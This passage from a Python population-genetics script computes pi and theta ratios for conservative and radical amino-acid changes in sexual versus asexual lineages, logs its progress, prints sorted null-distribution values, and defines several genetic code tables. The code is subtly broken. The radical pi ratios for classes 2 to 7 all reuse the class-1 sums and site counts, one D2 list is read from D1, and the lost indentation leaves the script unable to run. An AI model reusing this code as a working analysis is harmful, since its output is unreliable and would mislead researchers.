if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
elif len(currAlleleDict) == 2:
currFreqDict = {}
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
twoPQ *= freq
currFreqDict[codon] = freq
if len(aaList) == 1:
asex_synS += 2
asex_sum2PQ_S += (2*twoPQ)
i += 1
sexPiS = (len(sexList)/(len(sexList)-1))*(sex_sum2PQ_S/sexSynSites)
sexPiC1_PiS = ((len(sexList)/(len(sexList)-1))*(sex_sum2PQ_C1/sexC1Sites))/sexPiS
sexPiC2_PiS = ((len(sexList)/(len(sexList)-1))*(sex_sum2PQ_C2/sexC2Sites))/sexPiS
sexPiC3_PiS = ((len(sexList)/(len(sexList)-1))*(sex_sum2PQ_C3/sexC3Sites))/sexPiS
sexPiC4_PiS = ((len(sexList)/(len(sexList)-1))*(sex_sum2PQ_C4/sexC4Sites))/sexPiS
sexPiC5_PiS = ((len(sexList)/(len(sexList)-1))*(sex_sum2PQ_C5/sexC5Sites))/sexPiS
sexPiC6_PiS = ((len(sexList)/(len(sexList)-1))*(sex_sum2PQ_C6/sexC6Sites))/sexPiS
sexPiC7_PiS = ((len(sexList)/(len(sexList)-1))*(sex_sum2PQ_C7/sexC7Sites))/sexPiS
sexPiCMean_PiS = ((len(sexList)/(len(sexList)-1))*(sex_sum2PQ_meanC/sexMeanCSites))/sexPiS
sexPiR1_PiS = ((len(sexList)/(len(sexList)-1))*(sex_sum2PQ_R1/sexR1Sites))/sexPiS
sexPiR2_PiS = ((len(sexList)/(len(sexList)-1))*(sex_sum2PQ_R1/sexR1Sites))/sexPiS
sexPiR3_PiS = ((len(sexList)/(len(sexList)-1))*(sex_sum2PQ_R1/sexR1Sites))/sexPiS
sexPiR4_PiS = ((len(sexList)/(len(sexList)-1))*(sex_sum2PQ_R1/sexR1Sites))/sexPiS
sexPiR5_PiS = ((len(sexList)/(len(sexList)-1))*(sex_sum2PQ_R1/sexR1Sites))/sexPiS
sexPiR6_PiS = ((len(sexList)/(len(sexList)-1))*(sex_sum2PQ_R1/sexR1Sites))/sexPiS
sexPiR7_PiS = ((len(sexList)/(len(sexList)-1))*(sex_sum2PQ_R1/sexR1Sites))/sexPiS
sexPiRMean_PiS = ((len(sexList)/(len(sexList)-1))*(sex_sum2PQ_meanR/sexMeanRSites))/sexPiS
asexPiS = (len(asexList)/(len(asexList)-1))*(asex_sum2PQ_S/asexSynSites)
asexPiC1_PiS = ((len(asexList)/(len(asexList)-1))*(asex_sum2PQ_C1/asexC1Sites))/asexPiS
asexPiC2_PiS = ((len(asexList)/(len(asexList)-1))*(asex_sum2PQ_C2/asexC2Sites))/asexPiS
asexPiC3_PiS = ((len(asexList)/(len(asexList)-1))*(asex_sum2PQ_C3/asexC3Sites))/asexPiS
asexPiC4_PiS = ((len(asexList)/(len(asexList)-1))*(asex_sum2PQ_C4/asexC4Sites))/asexPiS
asexPiC5_PiS = ((len(asexList)/(len(asexList)-1))*(asex_sum2PQ_C5/asexC5Sites))/asexPiS
asexPiC6_PiS = ((len(asexList)/(len(asexList)-1))*(asex_sum2PQ_C6/asexC6Sites))/asexPiS
asexPiC7_PiS = ((len(asexList)/(len(asexList)-1))*(asex_sum2PQ_C7/asexC7Sites))/asexPiS
asexPiCMean_PiS = ((len(asexList)/(len(asexList)-1))*(asex_sum2PQ_meanC/asexMeanCSites))/asexPiS
asexPiR1_PiS = ((len(asexList)/(len(asexList)-1))*(asex_sum2PQ_R1/asexR1Sites))/asexPiS
asexPiR2_PiS = ((len(asexList)/(len(asexList)-1))*(asex_sum2PQ_R1/asexR1Sites))/asexPiS
asexPiR3_PiS = ((len(asexList)/(len(asexList)-1))*(asex_sum2PQ_R1/asexR1Sites))/asexPiS
asexPiR4_PiS = ((len(asexList)/(len(asexList)-1))*(asex_sum2PQ_R1/asexR1Sites))/asexPiS
asexPiR5_PiS = ((len(asexList)/(len(asexList)-1))*(asex_sum2PQ_R1/asexR1Sites))/asexPiS
asexPiR6_PiS = ((len(asexList)/(len(asexList)-1))*(asex_sum2PQ_R1/asexR1Sites))/asexPiS
asexPiR7_PiS = ((len(asexList)/(len(asexList)-1))*(asex_sum2PQ_R1/asexR1Sites))/asexPiS
asexPiRMean_PiS = ((len(asexList)/(len(asexList)-1))*(asex_sum2PQ_meanR/asexMeanRSites))/asexPiS
sexThetaS = sex_synS/(sexAn*sexSynSites)
sexThetaC1_ThetaS = (sex_con1S/(sexAn*sexC1Sites))/sexThetaS
sexThetaC2_ThetaS = (sex_con2S/(sexAn*sexC2Sites))/sexThetaS
sexThetaC3_ThetaS = (sex_con3S/(sexAn*sexC3Sites))/sexThetaS
sexThetaC4_ThetaS = (sex_con4S/(sexAn*sexC4Sites))/sexThetaS
sexThetaC5_ThetaS = (sex_con5S/(sexAn*sexC5Sites))/sexThetaS
sexThetaC6_ThetaS = (sex_con6S/(sexAn*sexC6Sites))/sexThetaS
sexThetaC7_ThetaS = (sex_con7S/(sexAn*sexC7Sites))/sexThetaS
sexThetaCMean_ThetaS = (sex_meanConS/(sexAn*sexMeanCSites))/sexThetaS
sexThetaR1_ThetaS = (sex_rad1S/(sexAn*sexR1Sites))/sexThetaS
sexThetaR2_ThetaS = (sex_rad2S/(sexAn*sexR2Sites))/sexThetaS
sexThetaR3_ThetaS = (sex_rad3S/(sexAn*sexR3Sites))/sexThetaS
sexThetaR4_ThetaS = (sex_rad4S/(sexAn*sexR4Sites))/sexThetaS
sexThetaR5_ThetaS = (sex_rad5S/(sexAn*sexR5Sites))/sexThetaS
sexThetaR6_ThetaS = (sex_rad6S/(sexAn*sexR6Sites))/sexThetaS
sexThetaR7_ThetaS = (sex_rad7S/(sexAn*sexR7Sites))/sexThetaS
sexThetaRMean_ThetaS = (sex_meanRadS/(sexAn*sexMeanRSites))/sexThetaS
asexThetaS = asex_synS/(asexAn*asexSynSites)
asexThetaC1_ThetaS = (asex_con1S/(asexAn*asexC1Sites))/asexThetaS
asexThetaC2_ThetaS = (asex_con2S/(asexAn*asexC2Sites))/asexThetaS
asexThetaC3_ThetaS = (asex_con3S/(asexAn*asexC3Sites))/asexThetaS
asexThetaC4_ThetaS = (asex_con4S/(asexAn*asexC4Sites))/asexThetaS
asexThetaC5_ThetaS = (asex_con5S/(asexAn*asexC5Sites))/asexThetaS
asexThetaC6_ThetaS = (asex_con6S/(asexAn*asexC6Sites))/asexThetaS
asexThetaC7_ThetaS = (asex_con7S/(asexAn*asexC7Sites))/asexThetaS
asexThetaCMean_ThetaS = (asex_meanConS/(asexAn*asexMeanCSites))/asexThetaS
asexThetaR1_ThetaS = (asex_rad1S/(asexAn*asexR1Sites))/asexThetaS
asexThetaR2_ThetaS = (asex_rad2S/(asexAn*asexR2Sites))/asexThetaS
asexThetaR3_ThetaS = (asex_rad3S/(asexAn*asexR3Sites))/asexThetaS
asexThetaR4_ThetaS = (asex_rad4S/(asexAn*asexR4Sites))/asexThetaS
asexThetaR5_ThetaS = (asex_rad5S/(asexAn*asexR5Sites))/asexThetaS
asexThetaR6_ThetaS = (asex_rad6S/(asexAn*asexR6Sites))/asexThetaS
asexThetaR7_ThetaS = (asex_rad7S/(asexAn*asexR7Sites))/asexThetaS
asexThetaRMean_ThetaS = (asex_meanRadS/(asexAn*asexMeanRSites))/asexThetaS
D1_1 = asexPiC1_PiS - sexPiC1_PiS #π conservative
D1_2 = asexPiC2_PiS - sexPiC2_PiS #π conservative
D1_3 = asexPiC3_PiS - sexPiC3_PiS #π conservative
D1_4 = asexPiC4_PiS - sexPiC4_PiS #π conservative
D1_5 = asexPiC5_PiS - sexPiC5_PiS #π conservative
D1_6 = asexPiC6_PiS - sexPiC6_PiS #π conservative
D1_7 = asexPiC7_PiS - sexPiC7_PiS #π conservative
D1_Mean = asexPiCMean_PiS - sexPiCMean_PiS #π conservative
D2_1 = asexPiR1_PiS - sexPiR1_PiS #π radical
D2_2 = asexPiR2_PiS - sexPiR2_PiS #π radical
D2_3 = asexPiR3_PiS - sexPiR3_PiS #π radical
D2_4 = asexPiR4_PiS - sexPiR4_PiS #π radical
D2_5 = asexPiR5_PiS - sexPiR5_PiS #π radical
D2_6 = asexPiR6_PiS - sexPiR6_PiS #π radical
D2_7 = asexPiR7_PiS - sexPiR7_PiS #π radical
D2_Mean = asexPiRMean_PiS - sexPiRMean_PiS #π radical
D3_1 = asexThetaC1_ThetaS - sexThetaC1_ThetaS #theta conservative
D3_2 = asexThetaC2_ThetaS - sexThetaC2_ThetaS #theta conservative
D3_3 = asexThetaC3_ThetaS - sexThetaC3_ThetaS #theta conservative
D3_4 = asexThetaC4_ThetaS - sexThetaC4_ThetaS #theta conservative
D3_5 = asexThetaC5_ThetaS - sexThetaC5_ThetaS #theta conservative
D3_6 = asexThetaC6_ThetaS - sexThetaC6_ThetaS #theta conservative
D3_7 = asexThetaC7_ThetaS - sexThetaC7_ThetaS #theta conservative
D3_Mean = asexThetaCMean_ThetaS - sexThetaCMean_ThetaS #theta conservative
D4_1 = asexThetaR1_ThetaS - sexThetaR1_ThetaS #theta radical
D4_2 = asexThetaR2_ThetaS - sexThetaR2_ThetaS #theta radical
D4_3 = asexThetaR3_ThetaS - sexThetaR3_ThetaS #theta radical
D4_4 = asexThetaR4_ThetaS - sexThetaR4_ThetaS #theta radical
D4_5 = asexThetaR5_ThetaS - sexThetaR5_ThetaS #theta radical
D4_6 = asexThetaR6_ThetaS - sexThetaR6_ThetaS #theta radical
D4_7 = asexThetaR7_ThetaS - sexThetaR7_ThetaS #theta radical
D4_Mean = asexThetaRMean_ThetaS - sexThetaRMean_ThetaS #theta radical
currD1_1 = D1[1]
currD1_2 = D1[2]
currD1_3 = D1[3]
currD1_4 = D1[4]
currD1_5 = D1[5]
currD1_6 = D1[6]
currD1_7 = D1[7]
currD1_Mean = D1['mean']
currD2_1 = D1[1]
currD2_2 = D2[2]
currD2_3 = D2[3]
currD2_4 = D2[4]
currD2_5 = D2[5]
currD2_6 = D2[6]
currD2_7 = D2[7]
currD2_Mean = D2['mean']
currD3_1 = D3[1]
currD3_2 = D3[2]
currD3_3 = D3[3]
currD3_4 = D3[4]
currD3_5 = D3[5]
currD3_6 = D3[6]
currD3_7 = D3[7]
currD3_Mean = D3['mean']
currD4_1 = D4[1]
currD4_2 = D4[2]
currD4_3 = D4[3]
currD4_4 = D4[4]
currD4_5 = D4[5]
currD4_6 = D4[6]
currD4_7 = D4[7]
currD4_Mean = D4['mean']
currD1_1.append(D1_1)
currD1_2.append(D1_2)
currD1_3.append(D1_3)
currD1_4.append(D1_4)
currD1_5.append(D1_5)
currD1_6.append(D1_6)
currD1_7.append(D1_7)
currD1_Mean.append(D1_Mean)
currD2_1.append(D2_1)
currD2_2.append(D2_2)
currD2_3.append(D2_3)
currD2_4.append(D2_4)
currD2_5.append(D2_5)
currD2_6.append(D2_6)
currD2_7.append(D2_7)
currD2_Mean.append(D2_Mean)
currD3_1.append(D3_1)
currD3_2.append(D3_2)
currD3_3.append(D3_3)
currD3_4.append(D3_4)
currD3_5.append(D3_5)
currD3_6.append(D3_6)
currD3_7.append(D3_7)
currD3_Mean.append(D3_Mean)
currD4_1.append(D4_1)
currD4_2.append(D4_2)
currD4_3.append(D4_3)
currD4_4.append(D4_4)
currD4_5.append(D4_5)
currD4_6.append(D4_6)
currD4_7.append(D4_7)
currD4_Mean.append(D4_Mean)
D1[1] = currD1_1
D1[2] = currD1_2
D1[3] = currD1_3
D1[4] = currD1_4
D1[5] = currD1_5
D1[6] = currD1_6
D1[7] = currD1_7
D1['mean'] = currD1_Mean
D2[1] = currD2_1
D2[2] = currD2_2
D2[3] = currD2_3
D2[4] = currD2_4
D2[5] = currD2_5
D2[6] = currD2_6
D2[7] = currD2_7
D2['mean'] = currD2_Mean
D3[1] = currD3_1
D3[2] = currD3_2
D3[3] = currD3_3
D3[4] = currD3_4
D3[5] = currD3_5
D3[6] = currD3_6
D3[7] = currD3_7
D3['mean'] = currD3_Mean
D4[1] = currD4_1
D4[2] = currD4_2
D4[3] = currD4_3
D4[4] = currD4_4
D4[5] = currD4_5
D4[6] = currD4_6
D4[7] = currD4_7
D4['mean'] = currD4_Mean
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('Finished calculating population genetic parameters\nSorting Population Genetic Parameters\n')
logfile.close()
sortedD1_1 = sorted(D1[1])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(1.0/32))) + '% complete\n')
logfile.close()
sortedD1_2 = sorted(D1[2])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(2.0/32))) + '% complete\n')
logfile.close()
sortedD1_3 = sorted(D1[3])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(3.0/32))) + '% complete\n')
logfile.close()
sortedD1_4 = sorted(D1[4])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(4.0/32))) + '% complete\n')
logfile.close()
sortedD1_5 = sorted(D1[5])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(5.0/32))) + '% complete\n')
logfile.close()
sortedD1_6 = sorted(D1[6])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(6.0/32))) + '% complete\n')
logfile.close()
sortedD1_7 = sorted(D1[7])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(7.0/32))) + '% complete\n')
logfile.close()
sortedD1_Mean = sorted(D1['mean'])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(8.0/32))) + '% complete\n')
logfile.close()
sortedD2_1 = sorted(D2[1])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(9.0/32))) + '% complete\n')
logfile.close()
sortedD2_2 = sorted(D2[2])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(10.0/32))) + '% complete\n')
logfile.close()
sortedD2_3 = sorted(D2[3])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(11.0/32))) + '% complete\n')
logfile.close()
sortedD2_4 = sorted(D2[4])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(12.0/32))) + '% complete\n')
logfile.close()
sortedD2_5 = sorted(D2[5])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(13.0/32))) + '% complete\n')
logfile.close()
sortedD2_6 = sorted(D2[6])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(14.0/32))) + '% complete\n')
logfile.close()
sortedD2_7 = sorted(D2[7])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(15.0/32))) + '% complete\n')
logfile.close()
sortedD2_Mean = sorted(D2['mean'])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(16.0/32))) + '% complete\n')
logfile.close()
sortedD3_1 = sorted(D3[1])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(17.0/32))) + '% complete\n')
logfile.close()
sortedD3_2 = sorted(D3[2])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(18.0/32))) + '% complete\n')
logfile.close()
sortedD3_3 = sorted(D3[3])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(19.0/32))) + '% complete\n')
logfile.close()
sortedD3_4 = sorted(D3[4])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(20.0/32))) + '% complete\n')
logfile.close()
sortedD3_5 = sorted(D3[5])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(21.0/32))) + '% complete\n')
logfile.close()
sortedD3_6 = sorted(D3[6])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(22.0/32))) + '% complete\n')
logfile.close()
sortedD3_7 = sorted(D3[7])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(23.0/32))) + '% complete\n')
logfile.close()
sortedD3_Mean = sorted(D3['mean'])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(24.0/32))) + '% complete\n')
logfile.close()
sortedD4_1 = sorted(D4[1])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(25.0/32))) + '% complete\n')
logfile.close()
sortedD4_2 = sorted(D4[2])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(26.0/32))) + '% complete\n')
logfile.close()
sortedD4_3 = sorted(D4[3])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(27.0/32))) + '% complete\n')
logfile.close()
sortedD4_4 = sorted(D4[4])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(28.0/32))) + '% complete\n')
logfile.close()
sortedD4_5 = sorted(D4[5])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(29.0/32))) + '% complete\n')
logfile.close()
sortedD4_6 = sorted(D4[6])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(30.0/32))) + '% complete\n')
logfile.close()
sortedD4_7 = sorted(D4[7])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('\t' + str(round(100*(31.0/32))) + '% complete\n')
logfile.close()
sortedD4_Mean = sorted(D4['mean'])
logfile = open('mt_nullDistribution_IantheAnalysis.log','a')
logfile.write('Finished sorting population genetic parameters\nWriting output to standard out\n')
i = 0
sys.stdout.write('D1_mean\tD2_mean\tD3_mean\tD4_mean\tD1_1\tD1_2\tD1_3\tD1_4\tD1_5\tD1_6\tD1_7\tD2_1\tD2_2\tD2_3\tD2_4\tD2_5\tD2_6\tD2_7\tD3_1\tD3_2\tD3_3\tD3_4\tD3_5\tD3_6\tD3_7\tD4_1\tD4_2\tD4_3\tD4_4\tD4_5\tD4_6\tD4_7\n')
logfile.close()
while i < 10000:
sys.stdout.write(str(sortedD1_Mean[i]) + '\t' + str(sortedD2_Mean[i]) + '\t' + str(sortedD3_Mean[i]) + '\t' + str(sortedD4_Mean[i]) + '\t' + str(sortedD1_1[i]) + '\t' + str(sortedD1_2[i]) + '\t' + str(sortedD1_3[i]) + '\t' + str(sortedD1_4[i]) + '\t' + str(sortedD1_5[i]) + '\t' + str(sortedD1_6[i]) + '\t' + str(sortedD1_7[i]) + '\t' + str(sortedD2_1[i]) + '\t' + str(sortedD2_2[i]) + '\t' + str(sortedD2_3[i]) + '\t' + str(sortedD2_4[i]) + '\t' + str(sortedD2_5[i]) + '\t' + str(sortedD2_6[i]) + '\t' + str(sortedD2_7[i]) + '\t' + str(sortedD3_1[i]) + '\t' + str(sortedD3_2[i]) + '\t' + str(sortedD3_3[i]) + '\t' + str(sortedD3_4[i]) + '\t' + str(sortedD3_5[i]) + '\t' + str(sortedD3_6[i]) + '\t' + str(sortedD3_7[i]) + '\t' + str(sortedD4_1[i]) + '\t' + str(sortedD4_2[i]) + '\t' + str(sortedD4_3[i]) + '\t' + str(sortedD4_4[i]) + '\t' + str(sortedD4_5[i]) + '\t' + str(sortedD4_6[i]) + '\t' + str(sortedD4_7[i]) + '\n')
i += 1
logfile.close()
def polSubSyn(fasta,code='invertebrateMt'):
geneticCodes = {'standard':{"TTT":"F", "TTC":"F", "TTA":"L", "TTG":"L", "TCT":"S", "TCC":"S", "TCA":"S", "TCG":"S", "TAT":"Y", "TAC":"Y", "TAA":"*", "TAG":"*", "TGT":"C", "TGC":"C", "TGA":"*", "TGG":"W", "CTT":"L", "CTC":"L", "CTA":"L", "CTG":"L", "CCT":"P", "CCC":"P", "CCA":"P", "CCG":"P", "CAT":"H", "CAC":"H", "CAA":"Q", "CAG":"Q", "CGT":"R", "CGC":"R", "CGA":"R", "CGG":"R", "ATT":"I", "ATC":"I", "ATA":"I", "ATG":"M", "ACT":"T", "ACC":"T", "ACA":"T", "ACG":"T", "AAT":"N", "AAC":"N", "AAA":"K", "AAG":"K", "AGT":"S", "AGC":"S", "AGA":"R", "AGG":"R", "GTT":"V", "GTC":"V", "GTA":"V", "GTG":"V", "GCT":"A", "GCC":"A", "GCA":"A", "GCG":"A", "GAT":"D", "GAC":"D", "GAA":"E", "GAG":"E", "GGT":"G", "GGC":"G", "GGA":"G", "GGG":"G"},'invertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'vertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': '*', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': '*', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'yeastMt':{'CTT': 'T', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'T', 'CTA': 'T', 'CTC': 'T', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'coelenterateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'ciliateNuc':{'CTT': 'L', 'TAG': 'Q', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Q', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'echinodermMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 